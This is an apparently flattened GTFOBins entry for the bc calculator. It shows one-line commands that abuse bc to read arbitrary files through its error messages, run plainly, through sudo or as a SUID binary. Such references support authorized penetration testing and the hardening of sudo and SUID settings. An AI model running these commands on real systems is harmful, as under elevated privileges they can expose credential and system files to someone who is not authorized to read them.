GTFOBins.github.io/_gtfobins/bc.md

422 B

description functions
The file content is actually parsed and appears as error messages, thus it might not be suitable to read arbitray binary files.
file-read sudo suid
code
LFILE=file_to_read bc -s $LFILE quit
code
LFILE=file_to_read sudo bc -s $LFILE quit
code
LFILE=file_to_read ./bc -s $LFILE quit